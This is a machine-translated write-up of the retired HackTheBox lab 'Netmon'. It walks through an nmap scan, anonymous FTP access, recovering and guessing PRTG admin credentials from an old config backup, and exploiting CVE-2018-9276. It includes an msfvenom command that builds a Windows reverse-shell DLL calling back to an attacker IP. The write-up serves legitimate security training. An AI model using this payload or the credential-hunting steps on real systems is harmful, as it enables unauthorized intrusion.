HackTheBox Writeup: Netmon (Easy/Windows)

This page has been machine-translated from the original page.

I am studying security using “Hack The Box,” a penetration testing learning platform. My Hack The Box rank at the time of writing is ProHacker.

This is a writeup for the retired HackTheBox machine “Netmon.”

About This Article

The content of this article is not intended to promote acts that violate social order.

Please be aware in advance that attempting to attack environments other than your own or environments for which you have permission may violate the “Act on Prohibition of Unauthorized Computer Access” (Unauthorized Access Prohibition Act).

All opinions expressed are my own and do not represent those of any organization I belong to.

Table of Contents

• Enumeration
• FTP Login
• Obtaining a Reverse Shell
• Obtaining Credentials
• Exploitation
• Summary

Enumeration

As usual, I start by running a scan.

sudo sed -i 's/^[0-9].*$RHOST/10.10.10.152  $RHOST/g' /etc/hosts
nmap -sV -sC -T4 $RHOST| tee nmap1.txt

The output looked like this:

Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-23 19:35 JST
Stats: 0:01:55 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 66.94% done; ETC: 19:38 (0:00:57 remaining)
Warning: 10.10.10.152 giving up on port because retransmission cap hit (6).
Nmap scan report for $RHOST (10.10.10.152)
Host is up (0.68s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT    STATE    SERVICE      VERSION
21/tcp  open     ftp          Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
80/tcp  open     http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
135/tcp open     msrpc        Microsoft Windows RPC
139/tcp open     netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open     microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
514/tcp filtered shell
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2021-11-23T10:44:51
|_  start_date: 2021-11-23T04:32:58
|_clock-skew: mean: 6m19s, deviation: 0s, median: 6m18s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 200.12 seconds

We can see that Anonymous FTP login is enabled.

FTP Login

After performing an Anonymous login, I was immediately able to obtain the user flag.

ftp $RHOST
# anonymous / no password

dir Users/Public
lcd ./
cd Users/Public
dir
get user.txt

Next, I aim to obtain a reverse shell in order to get the root flag.

Obtaining a Reverse Shell

From the nmap results, we can see that Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor) is running.

80/tcp  open     http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)

Searching for vulnerabilities in this version, I found CVE-2018-9276.

Reference: NVD - CVE-2018-9276

CVE-2018-9276 appears to be an OS command injection vulnerability where executing RCE can yield a shell with administrator privileges.

If this works, we should be able to get root as well.

Obtaining Credentials

To use CVE-2018-9276, we need credentials for Paessler PRTG bandwidth monitor.

So I began searching for credentials.

The default credential appears to be prtgadmin, but that didn’t work.

Reference: What’s the login name and password for the PRTG web interface? How do I change it? | Paessler Knowledge Base

So I explored the FTP server while logged in anonymously, looking for files containing credentials.

In most cases when searching for credentials, I target one of the following first:

• Config files containing configuration information
• Database dumps storing credentials
• Access logs with plaintext credentials
• Backup files or shadow copies recording past credentials

This time, I explored Paessler/PRTG Network Monitor under C:\ProgramData\.

Note that hidden folders like C:\ProgramData\ are not listed by the FTP dir command.

After obtaining a configuration backup file in this directory, I found the credentials prtgadmin / PrTg@dmin2018.

Unfortunately, these credentials are no longer valid.

Looking at the creation dates of the config files, the backup file containing PrTg@dmin2018 was created in 2018, while the current configuration file was created in 2019.

So I tried prtgadmin / PrTg@dmin2019, and authentication succeeded.

Exploitation

Now that I have credentials, I want to use this exploit code to obtain root.

Reference: CVE-2018-9276/exploit.py at main · A1vinSmith/CVE-2018-9276

I created my own msfvenom exploit module to make it work in my local environment, and partially modified the exploit code.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f dll > venom

Running this, I was successfully able to obtain root.

Summary

This was a very simple machine.